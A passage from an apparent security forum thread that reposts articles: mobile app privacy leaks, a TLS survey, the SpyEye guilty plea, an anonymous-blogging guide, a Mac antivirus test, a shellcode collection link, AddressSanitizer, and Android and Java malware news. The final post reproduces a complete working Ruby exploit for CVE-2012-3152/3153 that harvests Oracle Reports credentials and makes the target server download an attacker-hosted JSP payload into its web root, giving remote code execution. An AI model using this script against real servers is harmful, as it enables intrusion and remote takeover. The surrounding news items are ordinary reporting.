consequence of users' own, deliberate actions, such as: Twitter users having geolocation turned on, using the word "home" in their tweets and, Presto! thereby potentially handing a nosy little application their home address. Soldiers snapping photos that smartphones then automatically geotag, giving the enemy their coordinates. Fugitives' locations - John McAfee comes to mind - babbled by a photo's location metadata, precise latitude, longitude, time and all. Beyond bugs and deliberate leakage from probably-inattentive users is yet another category: apps that silently gulp data in the background while they're doing innocent-seeming things in the foreground, such as being a flashlight or a mobile app for kids. There are issues with mobile privacy, and then too there's security. Specifically, phones have lagged behind websites in their use of encryption, such as, for example, the notable lack of security in banking apps. Why cast a hairy eyeball at privacy as it plays out in Angry Birds profile data when you've got iOS banking apps to worry about? Given recent research from Ariel Sanchez, a researcher at security assessment company IOActive, there's very little security indeed to be had there. Sanchez found that out of 40 iOS banking apps used by 60 banks in about 20 countries, 70% of the apps offered no support at all for two-factor authentication (2FA), and 40% of the apps weren't validating SSL certificates - in other words, they weren't able to notice bogus SSL certificates when accessing supposedly secure HTTPS traffic and couldn't, therefore, stop a theoretical man-in-the-middle attack. What does this have to do with Angry Birds et al.? If the connection between the phones and the servers such apps were talking to had been well-encrypted, then it's likely that the data they exchanged would have been unintelligible to anyone trying to read it on-the-wire. Should Angry Birds, or ads on Angry Birds, or the other apps in question, or the ads on those apps, have been using HTTPS or some form of encryption? Yes. But the lack of such security measures isn't, unfortunately, remarkable, as research including Sanchez's work on iOS banking apps makes clear. Sursa: Spy agencies are slurping personal data from leaky mobile apps | Naked Security
  17. SSL/TLS analysis of the Internet's top 1,000,000 websites Par Julien Vehent le samedi, janvier 11 2014, 00:32 - General - Lien permanent It seems that evaluating different SSL/TLS configurations has become a hobby of mine. After publishing Server Side TLS back in October, my participation in discussions around ciphers preferences, key sizes, elliptic curves security etc...has significantly increased (ironically so, since the initial, naive, goal of "Server Side TLS" was to reduce the amount of discussion on this very topic). More guides are being written on configuring SSL/TLS server side. One that is quickly gaining traction is Better Crypto, which we discussed quite a bit on the dev-tech-crypto mailing list. People are often passionate about these discussions (and I am no exception). But one item that keeps coming back, is the will to kill deprecated ciphers as fast as possible, even if that means breaking connectivity for some users. I am absolutely against that, and still believe that it is best to keep backward compatibility to all users, even at the cost of maintaining RC4 or 3DES or 1024 DHE keys in our TLS servers. One question that came up recently, on dev-tech-crypto, is "can we remove RC4 from Firefox entirely ?". One would think that, since Firefox supports all of these other ciphers (AES, AES-GCM, 3DES, Camellia, ...), surely we can remove RC4 without impacting users. But without numbers, it is not an easy decision to make. Challenge accepted: I took my cipherscan arsenal for a spin, and decided to scan the Internet. Articol: https://jve.linuxwall.info/blog/index.php?post/TLS_Survey
  18. SpyEye malware creator Aleksandr Panin pleads guilty Graham Cluley | January 29, 2014 9:29 am The primary developer of the notorious SpyEye banking malware has pleaded guilty to conspiracy to commit wire and bank fraud, in relation to his role in a cybercriminal campaign that has infected over 1.4 million computers worldwide. SpyEye, a variant of the Zeus banking Trojan, is used by criminal gangs to help them break into victims’ online bamk accounts and steal personally identifiable information. Sold on the criminal underground as a kit for between $1,000 to $8,500, hackers could take SpyEye and customise it for their own malicious purposes. Once computers have become infected by SpyEye, online criminals are able to remotely control them, logging keystrokes and stealing personal and financial data that is silently transmitted to servers under the hackers’ control. According to a Department of Justice press release, Russian national Aleksandr Andreevich Panin (who used the online handles “Gribodemon” and “Harderman”) has now admitted his involvement. “The apprehension of Mr. Panin means that one of the world’s top developers of malicious software is no longer in a position to create computer programs that can victimize people around the world. Botnets such as SpyEye represent one of the most dangerous types of malicious software on the Internet today, which can steal people’s identities and money from their bank accounts without their knowledge. The FBI will continue working with partners domestically and internationally to combat cyber-crime.” Between 2009 and 2011, Panin operated from his Russian base, conspiring with others to develop, market and sell versions of SpyEye to other online criminals. In all, Panin is thought to have sold the SpyEye malware kit to over 150 criminals. One of them, using the name “Soldier” is reported to have used SpyEye to earn more than $3.2 million in just six months. Panin’s cybercrime career came unstuck, however, when he took a holiday in the Dominican Republic last summer. Without formally extraditing him, local police threw him onto a plane to the United States where he was arrested by federal agents. The nature of Panin’s arrest raised controversy in Russia, where the foreign affairs ministry warned citizens who believed they might have charges raised against them to avoid travelling overseas. Arrests at airports appears to have become a theme in the apprehension of the key individuals involved in the SpyEye malware case. Amongst Panin’s alleged conspirators was Hamza Bendelladj, aka “Bx1,” who smiled broadly as he was paraded before the media after his arrest at Bangkok’s Suvarnnabhumi airport in January 2013, as he was in transit from Malaysia to Egypt. Bendelladj was subsequently extradited to the United States, and is currently pending charges. Sentencing for Panin is scheduled for April 29, 2014. Sursa: SpyEye malware creator Aleksandr Panin pleads guilty
  19. How to Start an Anonymous Blog 26 January 2014 Introduction I believe that by following the steps I outlined in this post, no one will ever be able to reveal my identity. My domain may be seized and my blog can be closed, but I am confident that my identity will remain a mystery. I can say these things mainly because I believe in a very important tool called Tor. Developers and operators of Tor nodes work to ensure that anyone can be anonymous on the internet. Tor is a great pain to the NSA, and any other organization or country that wants to spy on internet activity. The Tor network makes it very difficult to track down IP addresses, and domain registration is now available via Bitcoin, so I never needed to provide any personal information when setting up this blog. Tools and Resources USB Drive Tails OS Tor Network Local Bitcoins — buy Bitcoins for cash Free email accounts from outlook.com and anonymousspeech.com Domain name purchased from IT Itch Static site hosted on GitHub Pages Tails / Tor Tails is started from a USB disk, which also includes an encrypted partition. The encrypted partition holds a Bitcoin wallet, blog source code and Keepass database. My passwords for third-party services are randomly generated, and very strong. Tails makes it very hard to go wrong, because all network connections are forced through Tor. For example, to develop this blog locally, I must add some firewall rules to allow local connections on port 4000, download a different browser (Midori), and then tell it to skip using a proxy server. The firewall rules block all external requests in Midori, but I can access http://localhost:4000. So unless I do some nonsense like log in to StackOverflow using my real Google account and use the “untraceableblog” username, I believe it will be almost impossible to track me. I make a backup of the USB flash drive on my primary computer and save it to a TrueCrypt hidden volume. I like the idea of hidden volumes, I feel like a fucking spy. The idea is that you can have a fake password that unlocks the encrypted fake folder, and a real password that unlocks the real encrypted folder, and there is absolutely no way to know which one you unlocked. In my fake encrypted folder, I keep my personal Keepass database, credit cards, and scans of my passport and driving license. So if someone forces me to enter my password to unlock my computer, and finds that in their opinion, I have a volume of TrueCrypt, then there is no way of knowing if I entered the real or fake password. This feature allows even a little protection from “wrench attacks”: XKCD: wrench attacks Most of the time I hide the stick in a secret location in the house. When I need to go somewhere and want to be able to update this blog, I’ll back it up to the hidden volume, and then securely erase the USB disk, so I can take it with me without fear. This is what I must do until the Tails adds its own function for ‘hidden volumes’. E-mail I signed up for a free email account from Outlook.com, and used anonymousspeech.com account as a verification and backup. I tried Gmail first, but Google makes it very difficult to sign up for accounts, when you use Tor, because they require phone verification. This is fair enough, because people like to create a huge number of fake accounts Gmail to send spam. Blog This blog is free on GitHub Pages. It uses Octopress to create a static site, and I installed the Page Turner theme. I push to GitHub with an SSH key, which is, of course, encrypted and stored on my USB stick. I can think of two vectors, which can give out information about my identity: Message Timestamps The Tails operating system has a good policy of forcing the system time to always be UTC. But if I wrote a series of blog posts in the coming years, you could maybe analyize timestamps to determine my time zone. However, the compiled site shows only the date. Also, I travel a lot. (Or do I?) Word and character frequency analysis You may be able to find out my country of origin or identity by my words and phrases. You might even be able to find a match with the other content that I posted online under my real identity. I counter this by running all my posts through Google Translate. I translate into another language, then to English, and then correct the errors. It’s great for mixing up my vocabulary, but I wish it didn’t fuck up Markdown and HTML so much. Until this point, you might have assumed that English was my second language. But let me assure you, I will neither confirm nor deny it. One problem is that Google can see my original messages, and the NSA can probably see them too. If I wanted to avoid it, I could post some anonymous translation jobs and pay the translaters via Bitcoin. Analytics See the email section for reasons why Google Analytics was unavailable. I signed up for StatCounter instead. But even if Google Analytics were available, I wouldn’t use a tracking ID linked to my real identity. Many anonymous bloggers have been busted by Google’s Reverse ID Lookup tool. Buying Bitcoins with maximum anonymity I bought the Bitcoins from local Bitcoins, using an anonymous account that I set up over Tor. I found a seller who was willing to meet in person, and we agreed on a time and place. We met, I gave them money, and they released the Bitcoins from escrow using their phone. Buying a domain name with Bitcoins IT Itch is a domain registrar that accepts payments via BitPay. Their domains are quite expensive at $15 USD each, but worth it for completely anonymous registration. This was an easy process, but it took a long time for the domain to become active (over an hour). Once it had been activated, I configured the DNS records for GitHub Pages, and then my blog was live at Untraceable One thing that IT Itch did terribly wrong was to e-mail me my password in plain text after I signed up. NO GOOD! If someone got access to my outlook email, they could have signed in and ruined my domain. So I deleted the message and changed my password, and luckily they did not email me a new password. How I could get busted, Part One Tracing the Bitcoins In theory, you could follow the trail of Bitcoin transactions and discover my identity. However, in this case, it is very unlikely that even the most sophisticated and well-funded organizations would be able to find me. See, I bought these Bitcoins using an anonymous account on localbitcoins.com (created using Tor). The seller and I agreed on the spot to meet in person, and I paid cash. To reveal my identity, you would need to break or work for every service that I used. Like this: 1) Get access to the ititch.com database, and find the BitPay transaction identifier for untraceableblog.com 2) Get access to the BitPay database, and find the Bitcoin address that sent Bitcoins for this transaction 3) Get access to the localbitcoins.com database. Find the Bitcoin address which sent the coins to BitPay, trace the transactions back until you find a localbitcoins escrow address. 4) From the escrow address, you might be able to find the localbitcoins accounts, and then you can read the messages that we exchanged about meeting up. 5) You would need to visit this location, and hope that there are some surveillance cameras that might have captured us on the day. 6) You’d finally need access to the security company that has security camera footage archives, get a clear picture of my face, and somehow run a facial recognition scan to find my identity. Working for Facebook or the NSA may help if you get that far. How I could get busted, Part Two Everything is hacked. All of it. The Internet is a machine based on trust, and there are many ways that this trust can be broken. Someone may be able to generate trusted SSL certificates for any domain, demand that ISPs route all traffic through them, or control a huge amount of Tor nodes and perform traffic analysis attacks. I will not go into details, but if you’re interested, you can read more about Tor attacks: How NSA attacks Tor / Firefox users with quantum and FOXACID Articles about attacks on the blog Tor Conclusion This blog was just a fun exercise in anonymity, although I might use it to post some things in the future. I am just using the tools built by people much smarter than me, and I’m certainly not the first anonymous blogger, but I hope you learned something new. Of course, the rabbit hole can go much deeper than this. I could have hosted this blog on a VPS that I rented with Bitcoins, and set up the server as a Tor hidden service. The server’s IP address would be fully protected, but then you could have only read the blog by connecting to the Tor network, and onion links just don’t make it to the front page. I could have also done all my activities from a coffee shop, just in case Tor was compromised, but I couldn’t be fucked. Finally, I could have chosen an “.se” domain if I was scared about U.S. government intervention. That’s what The Pirate Bay is using now, and the Swedes are just letting them do their thing. Please feel free to send me some spare Satoshis if you enjoyed the post: 146g3vSB64KxxnjWbb2vnjeaom6WYevcQb. And if you can find me, I’ll be very impressed. Sursa: Untraceable
  20. Mac anti-virus testing 2014 Posted on January 27th, 2014 at 8:49 AM EST Almost exactly one year ago, I completed a round of tests of 20 different anti-virus programs on the Mac. Because this is an area of software that is in almost constant flux, I felt it was important to repeat that test this year. I was very curious about whether these programs were still as effective (or ineffective) as they had been, and how well they detected new malware that had appeared since the last test was performed. After last year’s testing, I received a number of requests for tests of other apps. This year’s testing sees a change in some of the apps being tested. Four new apps were added, while two were removed from testing (one simply because it was redundant). The malware samples used also went through a change. Some samples were removed, in an attempt to remove any that might have been deemed questionable, while others were added. Multiple samples of each of nine new malicious programs, which did not exist at the time of last year’s testing, were included. Scope As with last year, it’s important to understand the scope of this testing. This test is a measure only of the detection of specific malware samples when performing a manual scan. It makes no attempt to quantify the performance or stability of the various anti-virus apps, or to compare feature sets, or to identify how well an anti-virus app would block an active infection attempt. In a way, this test is merely a probe to see what items are included in the database of signatures recognized by each anti-virus app. The success of an app in this testing should not be taken as endorsement of that app, and in fact, some apps that performed well appear to have anecdotal problems that frequently appear in online forums. It is also important to understand small variations in the numbers. Some of the software that was tested varied from each other, or from last year’s testing, by only a couple percentage points. It’s important to understand that such a variation is not significant. A 98% and a 97%, or a 60% and a 59%, should be considered identical, for all intents and purposes. Methods Testing methodology was mostly the same as last year. A group of 188 samples, from 39 different malware families, was used for testing. Any samples that were not already present in the VirusTotal database were uploaded to VirusTotal, so that the samples would be available to the anti-virus community. The SHA1 checksum of each sample is included in the data, to allow those with access to VirusTotal to download the samples used and replicate my tests. Where possible, the full, original malware was included in testing. In many cases, such a sample will be found within a .zip or .dmg archive on VirusTotal, but such samples were not included in that form. All items were removed from their archives, and the archives were discarded, in order to put all anti-virus engines on a level playing field. (Some will check inside such archives and some will not.) In a number of cases, I have not been able to obtain full copies of the malware, but included executable components and the like. Testing was done in virtual machines in Parallels Desktop 9.0.24172.951362. I started with a virtual machine (VM) that consisted of a clean Mac OS X 10.9.1 installation, with Chrome and Firefox also installed. A snapshot of this system was made, and then this VM was used as the basis for all testing. I installed each anti-virus app (engine) in that VM, saved a snapshot, reverted to the original base VM and repeated. Once installations were done, I ran each VM and updated the virus definitions in each anti-virus app (where possible), then saved another snapshot of this state and deleted the previous one. The end result was a series of VMs, each containing a fully up-to-date anti-virus app, frozen at some time on January 16. After that point, testing began. Testing took multiple days, but with the network connection cut off, the clock in the virtual system remained set to January 16, shortly after the anti-virus software was updated, and further background updates were not possible. Malware was copied onto the system inside an encrypted .zip file (to prevent accidental detection), which was then expanded into a folder full of samples. Each anti-virus app had any real-time or on-access scanning disabled, to prevent premature detection of malware. If an error was made, and malware was detected and quarantined in the process of expanding the archive, the VM was reset, settings in the anti-virus app were changed, and the process repeated. Once the malware was in place, scans commenced. Each app was used to scan that folder, or if custom scans were not allowed, a scan was done that would include the test user’s home folder, where the malware samples resided. Results were collected, in most cases in a very inconvenient manner. A few of the anti-virus apps allowed me to save or retrieve a log that contained information about what was detected, but most did not. In most cases, I was only able to capture the data by paging through a list of detected malware and taking a series of screenshots. Once collection of the data was done, a post-scan snapshot of the VM was saved, so that the results could be reviewed later as necessary. After the data was collected, the painstaking process of tabulating it began. Data was entered in a Numbers spreadsheet. A great deal of care was taken to ensure that no errors were made, but when tabulating data of this nature (trying to match up 64-digit hexadecimal numbers), it is entirely possible that transcription errors ended up in the data. Any errors brought to my attention will be immediately corrected. Data The complete data can be downloaded as either a Numbers spreadsheet or a PDF file. (An Excel file was not provided because some of the formatting that made the data more readable did not make the conversion well.) Detection rates (defined as the percentage of samples that were detected) varied widely, from 98% down to 0%. Only 9 anti-virus engines tested performed at 91% or better, and around 2/3 of the engines got a “passing grade” (72% and up). Nine performed at 60% or lower. Five did so poorly – between 12% and no detections at all – that I would consider them to be scams. [TABLE=class: alternatingRows, width: 100%] [TR] [TD][/TD] [TD]Samples detected[/TD] [TD]Percentage detected[/TD] [/TR] [TR] [TD]VirusBarrier 10.7.8 (772)[/TD] [TD]187[/TD] [TD]99%[/TD] [/TR] [TR] [TD]avast! Free Antivirus 8.0 (40005)[/TD] [TD]184[/TD] [TD]98%[/TD] [/TR] [TR] [TD]ESET Cybersecurity 5.0.115.0[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Sophos Anti-Virus for Mac 9.0.6[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Avira Mac Security 2.0.1.105[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]F-Secure Anti-virus for Mac 0.1.?[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]Dr. Web Light 6.0.6 (201207050)*[/TD] [TD]179[/TD] [TD]95%[/TD] [/TR] [TR] [TD]Kaspersky Security 14.0.1.46[/TD] [TD]177[/TD] [TD]94%[/TD] [/TR] [TR] [TD]Comodo Antivirus 1.1.214829.106*[/TD] [TD]172[/TD] [TD]91%[/TD] [/TR] [TR] [TD]WebRoot SecureAnywhere 8.0.5.82: 134[/TD] [TD]162[/TD] [TD]86%[/TD] [/TR] [TR] [TD]Norton Anti-Virus 12.6 (26)[/TD] [TD]158[/TD] [TD]84%[/TD] [/TR] [TR] [TD]BitDefender 2.21 (2.21.4959)*[/TD] [TD]143[/TD] [TD]76%[/TD] [/TR] [TR] [TD]ClamXav 2.6.1 (304)[/TD] [TD]136[/TD] [TD]72%[/TD] [/TR] [TR] [TD]AVG AntiVirus 14.0 (4172)[/TD] [TD]115[/TD] [TD]61%[/TD] [/TR] [TR] [TD]Trend Micro Titanium 2.0.1279[/TD] [TD]112[/TD] [TD]60%[/TD] [/TR] [TR] [TD]ProtectMac 1.4[/TD] [TD]107[/TD] [TD]57%[/TD] [/TR] [TR] [TD]McAfee Endpoint Protection for Mac 2.1.0 (1085)[/TD] [TD]99[/TD] [TD]53%[/TD] [/TR] [TR] [TD]FortiClient 5.0.7.135[/TD] [TD]22[/TD] [TD]12%[/TD] [/TR] [TR] [TD]iAntivirus 1.1.4 (282)[/TD] [TD]19[/TD] [TD]10%[/TD] [/TR] [TR] [TD]MacScan 2.9.4*[/TD] [TD]4[/TD] [TD]2%[/TD] [/TR] [TR] [TD]Magician Anti-Trojan 1.4.8[/TD] [TD]1[/TD] [TD]1%[/TD] [/TR] [TR] [TD]MaxSecureAntivirus 1.0.1 (1.0.1)[/TD] [TD]0[/TD] [TD]0%[/TD] [/TR] [/TABLE] (* The version of anti-virus apps marked with an asterisk did not change since last year’s testing, though of course this has no bearing on signature database updates.) Last year, detections were broken down into active and inactive malware. I decided not to do that this year, as in some cases, the decision about whether to identify a particular piece of malware as active or inactive is difficult to make. Instead, I listed the year the malware family first appeared, and sorted the results by that year. In general, most malware that appeared in 2011 and earlier is inactive at this point, while a significant portion of malware newer than that is probably still active. Exploit.OSX.Safari Detection rates of each sample varied widely, with an average of 14 engines detecting each sample. One sample was detected by only 6 anti-virus engines, and three samples (all copies of Exploit.OSX.Safari) were only detected by one engine. These were included nonetheless because I know that they are malware. Strangely, in the case of the three Exploit.OSX.Safari samples, the malware is detected at a much greater rate when a .zip file containing the sample is scanned! The rate drops off to almost zero when the actual malicious file itself – a shell script disguised as a QuickTime movie – is scanned, both in my own testing and on VirusTotal. Conclusions Although it is important to keep in mind that this is only one measure of the quality of each of the tested anti-virus engines, it is not an unimportant one. Obviously, although it is not feasible for any anti-virus software to detect 100% of all malware, a good engine should be capable of coming as close to that number as possible. This is especially true in the Mac world, where the limited number of malware families means that detection rates of very close to 100% should be possible. As expected, some engines did indeed perform to that standard. Other engines did not fare so well. However, it is important to keep in mind that Mac OS X already does an admirable job of protecting against malware. At this time, there is no known malware capable of infecting a Mac running a properly-updated version of Mac OS X 10.6 or later, with all security settings left at the default (at a minimum). The role of anti-virus software must be taken into consideration, and some compromises in detection rate may be desirable to get desired behavior (or avoid bad behavior). Someone who wants a low-impact engine for scanning e-mail messages for Windows viruses will have very different needs than someone who needs to protect a computer from an irresponsible teenager who will download and install anything that catches his/her attention. It should also be noted that this test says nothing whatsoever about detection rates of Windows or Android malware. An engine that performs well against Mac malware may do quite poorly on malware for other systems, and likewise, one that does poorly with Mac malware may be very good with other malware. If your primary goal is to use anti-virus software to catch malware for other systems, so as to avoid passing it on, then this testing is not particularly relevant. When choosing anti-virus software, always take the full set of features into account, as well as seeking out community feedback regarding stability and performance. Be sure that you know how to uninstall the software before installing it, in case it causes problems and needs to be removed. If you should need to remove anti-virus software, always use the uninstaller provided with the software. Do not use generalized uninstall apps that claim to be able to find and remove all components of any application; such apps are unreliable. For more on the topic of protecting your Mac against malware, see my Mac Malware Guide. Objections There are a few objections that some may have with this test, so allow me to address them in advance. First, some will object that this is a rather artificial test, and not a real-world one. Although it would obviously be better to test by trying to infect a system with a variety of malware and determining whether each anti-virus software would block the infection, this is impractical. Not only would it be exceedingly time consuming with only a few samples, but it would be fairly meaningless as well, since Mac OS X is currently able to block all known malware through a variety of methods. Testing with static samples may be less informative, but it does give valuable information about the completeness of each engine’s virus definitions database. The sample size has improved significantly since earlier testing, consisting of 188 samples. Of course, this is still a very small sample size compared to Windows anti-virus testing, in which case many hundreds or thousands of samples would be used. Of course, taking into consideration the fact that there are millions of malware samples to be had in the Windows world, and very few in the Mac world, 188 samples is probably a more statistically significant number than what is used for most Windows-based tests. My opinion is that the samples used are a pretty good selection of Mac malware. A few of the engines tested appear to be enterprise-oriented programs. (In other words, they are aimed at being installed on large numbers of computers by large companies.) I chose to include these anyway, even though some people object to comparison of enterprise- and consumer-level anti-virus products. There are a number of end users who may be using one of these enterprise products on a company machine, and who are curious how well it detects Mac malware, and it is important to keep in mind that these tests do not represent a direct comparison between the engines being tested, but rather are a test against a particular standard: which samples are and are not detected. Finally, some may object to the fact that more than half of the samples are what would be considered “extinct” malware, since such samples are no longer a real threat to anyone. However, information about what malware has been detected historically by an anti-virus engine is important for predicting future accuracy. In fact, looking at the data, there is no apparent increase in detection rate with newer malware. There’s also the fact that some people may be looking for anti-virus software for old, legacy systems that may have malware infections from years past still in place. After all, Intego recently revealed that there are still at least 22,000 Macs infected with the extinct Flashback malware. Anti-virus Engine Notes There were a number of important or interesting points to make about specific anti-virus engines. AVG had no way that I could determine to manually update its malware signatures. I simply allowed the VM containing AVG to run unattended for a while on January 16th, in an attempt to ensure the signatures were up-to-date. However, since there also is no apparent way to get information about the version of the signature database, I’m uncertain as to whether this strategy was successful. The author of ClamXav is temporarily unable to add malware signatures to the official ClamAV signature database, but is working on a version of ClamXav that can download Mac-specific signatures separately. Once this is done, ClamXav detections should be able to get back on track again. Comodo‘s installer was identified as being from an unidentified developer, due to not being code signed with a valid Apple Developer ID, and thus was blocked by Gatekeeper. This is a very serious failing on the part of a security app, in my opinion. I was forced to bypass Gatekeeper in order to install the program. iAntivirus apparently does not feature any kind of mechanism for updating its definitions. (This is confirmed by a Symantec employee in the Norton forums.) I am unsure of the exact age of the current version of iAntivirus (version 1.1.4), but the comments people have made about this version in the Mac App Store date back to April 15, 2013, meaning that the malware signatures are at a minimum nine months old! MacKeeper was removed from testing. It is an app that I actively recommend against using, but its anti-virus “back end” is an engine that performs well in my testing. I did not want to seem to give legitimacy to the program when I am strongly opposed to its use. Magician is an app very similar to MacKeeper, and appears to be of similar quality, since it only detected one single sample. I strongly advise against its use in any capacity. MaxSecureAntivirus detected absolutely none of the samples. It was the only app I was forced to purchase (for $10) in order to test. Apple has given me a refund, and is reviewing the app at this time. It is my hope that it is removed from the App Store, as it is a complete and utter scam, in my opinion. Norton‘s performance was absolutely abysmal, even considering the limited capabilities performance-wise of the VM it was running in. Nearly every action, including mounting a USB flash drive containing the malware in the Finder, took far longer than it did with any of the other VMs used in testing. VirusBarrier Express was removed from testing due to redundancy. It should have the same detections as VirusBarrier, so I chose not to test it. Updates January 28, 2014: 5 samples were inadvertently included as .jar archive files. These files were decompressed and re-scanned with all engines that missed them the first time around. There were very few changes. Only VirusBarrier, AVG and iAntivirus results changed. Revision 2 of the data files is now available at the original links given in the Data section. Sursa: The Safe Mac
  21. Shellcodecs is a collection of shellcode, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. Contents 1 Dependencies 2 Contents 3 Download shellcodecs 4 Building the code 5 Using the tools 5.1 Generators 5.1.1 Standard shellcode generator 5.1.2 Socket re-use shellcode generator [*]5.2 Loaders [*]6 Getting help [*]7 Credits Dependencies In order to run these shellcodes, the following dependencies are required: Linux GCC Generators require Python 2.7 Automake Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the shellcode appendix. Link: Shellcodecs - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
  22. AddressSanitizer AddressSanitizer: a fast memory error detector Updated Oct 16, 2013 by samso...@google.com Introduction Getting AddressSanitizer Using AddressSanitizer Interaction with other tools gdb ulimit -v [*]Flags [*]Call stack [*]Incompatibility [*]Turning off instrumentation [*]FAQ [*]Comments? New: AddressSanitizer is released as part of LLVM 3.1. New: Watch the presentation from the LLVM Developer's meeting (Nov 18, 2011): , slides. New: Read the USENIX ATC '2012 paper. Introduction AddressSanitizer (aka ASan) is a memory error detector for C/C++. It finds: Use after free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Initialization order bugs This tool is very fast. The average slowdown of the instrumented program is ~2x (see PerformanceNumbers). The tool consists of a compiler instrumentation module (currently, an LLVM pass) and a run-time library which replaces the malloc function. The tool works on x86 Linux and Mac. See also: AddressSanitizerAlgorithm -- if you are curious how it works. ComparisonOfMemoryTools Sursa: https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer
  23. Android bootkit malware infects more than 350,000 Android devices Graham Cluley | January 29, 2014 8:46 am Experts at Russian security firm Dr Web have issued a warning about a dangerous Trojan horse affecting more than 350,000 Android users. What makes this malware attack unusual is that it is designed to reinstall itself after you reboot your Android device, even if you have deleted all of its working components, reinfecting the system. Dr Web has dubbed the malware Android.Oldboot, and report that it can download, install and remove applications on infected Android devices, opening opportunities for hackers to gain control and make money from the hundreds of thousands of Android devices already infected. And, according to the researchers, it appears that the devices most at risk are those which have been reflashed with modified firmware (it’s not unusual for Android owners to root their devices and install customised versions of the operating system onto their smartphones). Reflashing a device with modified firmware that contains the routines required for the Trojan’s operation is the most likely way this threat is introduced. Over 90% of the infected devices determined by the Dr Web researchers are based in China (the malware’s apparent target), but there are also reports of infections amongst Android users in Spain, Italy, Germany, Russia, Brazil, the United States and some South East Asian countries. Android malware is a growing problem, and as more criminals try to earn money by exploiting Android devices we can expect to see more and more sophisticated attacks. Clearly it’s important for those Android users who are reflashing and rooting their devices to exercise caution over where they get they download their homebrewed alternative versions of the operating system, as it’s possible it could be harbouring malware. And, realise this. If you’re not yet running anti-virus software on your Android device, you are playing an increasingly dangerous game. Sursa: Android bootkit malware infects more than 350,000 Android devices
  24. Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices Multi-platform threat exploits old Java flaw, gains persistence. by Dan Goodin - Jan 28 2014, 6:00pm EST Researchers have uncovered a piece of botnet malware that is capable of infecting computers running Windows, Mac OS X, and Linux that have Oracle's Java software framework installed. The cross-platform HEUR Backdoor.Java.Agent.a, as reported in a blog post published Tuesday by Kaspersky Lab, takes hold of computers by exploiting CVE-2013-2465, a critical Java vulnerability that Oracle patched in June. The security bug is present on Java 7 u21 and earlier. Once the bot has infected a computer, it copies itself to the autostart directory of its respective platform to ensure it runs whenever the machine is turned on. Compromised computers then report to an Internet relay chat channel that acts as a command and control server. The botnet is designed to conduct distributed denial-of-service attacks on targets of the attackers' choice. Commands issued in the IRC channel allow the attackers to specify the IP address, port number, intensity, and duration of attacks. The malware is written entirely in Java, allowing it to run on Windows OS X and Linux machines. For added flexibility, the bot incorporates PircBot, an IRC programming interface based on Java. The malware also uses the Zelix Klassmaster obfuscator to prevent it from being reverse engineered by whitehat and competing blackhat hackers. Besides obfuscating bytecode, Zelix encrypts some of the inner workings of the malware. Sursa: Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices | Ars Technica
  25. Automated exploit for CVE-2012-3152 / CVE-2012-3153 by Mekanismen #!/usr/bin/env ruby require 'uri' require 'open-uri' require 'openssl' #OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE def upload_payload(dest) url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'" #print url begin uri = URI.parse(url) html = uri.open.read rescue html = "" end if html =~ /Successfully run/ @hacked = true print "[+] Payload uploaded!\n" else print "[-] Payload uploaded failed\n" end end def getenv(server, authid) print "[+] Found server: #{server}\n" print "[+] Found credentials: #{authid}\n" print " [*] Querying showenv ... \n" begin uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}") html = uri.open.read rescue html = "" end if html =~ /\/(.*)\/showenv/ print "[+] Query succeeded, uploading payload ... \n" upload_payload($1) else print "[-] Query failed... \n" end end @payload_url = "" #the url that holds our payload (we can execute .jsp on the server) @url = "" #url to compromise @hacked = false @payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp" print " [*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n" print " [*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n" print " [*] Credits to: @miss_sudo\n" unless ARGV[0] and ARGV[1] print "[-] Usage: ./pwnacle.rb target_url payload_url\n" exit end @url = ARGV[0] @payload_url = ARGV[1] print " [*] Target URL: #{@url}\n" print " [*] Payload URL: #{@payload_url}\n" print " [*] Payload name: #{@payload_name}\n" begin #Can we view keymaps? uri = URI.parse("#{@url}/reports/rwservlet/showmap") html = uri.open.read rescue print "[-] URL not vulnerable or unreachable\n" exit end test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten #Parse keymaps for servers print " [*] Enumerating keymaps ... \n" test.each do |t| if not @hacked t = t.delete(' ') url = "#{@url}/reports/rwservlet/parsequery?#{t}" begin uri = URI.parse(url) html = uri.open.read rescue end #to automate exploitation we need to query showenv for a local path #we need a server id and creds for this, we enumerate the keymaps and hope for the best #showenv tells us the local PATH of /reports/ where we upload the shell #so we can reach it from /reports/images/<shell>.jsp if html =~ /userid=(.*)@/ authid = $1 end if html =~ /server=(\S*)/ server = $1 end if server and authid getenv(server, authid) end else break end end if @hacked print " [*] Server hopefully compromised!\n" print " [*] Payload url: #{@url}/reports/images/#{@payload_name}\n" else print " [*] Enumeration done ... no vulnerable keymaps for automatic explotation found \n" #server is still vulnerable but cannot be automatically exploited ... i guess end Sursa: https://github.com/Mekanismen/pwnacle-fusion/blob/master/pwnacle.rb
×
×
  • Create New...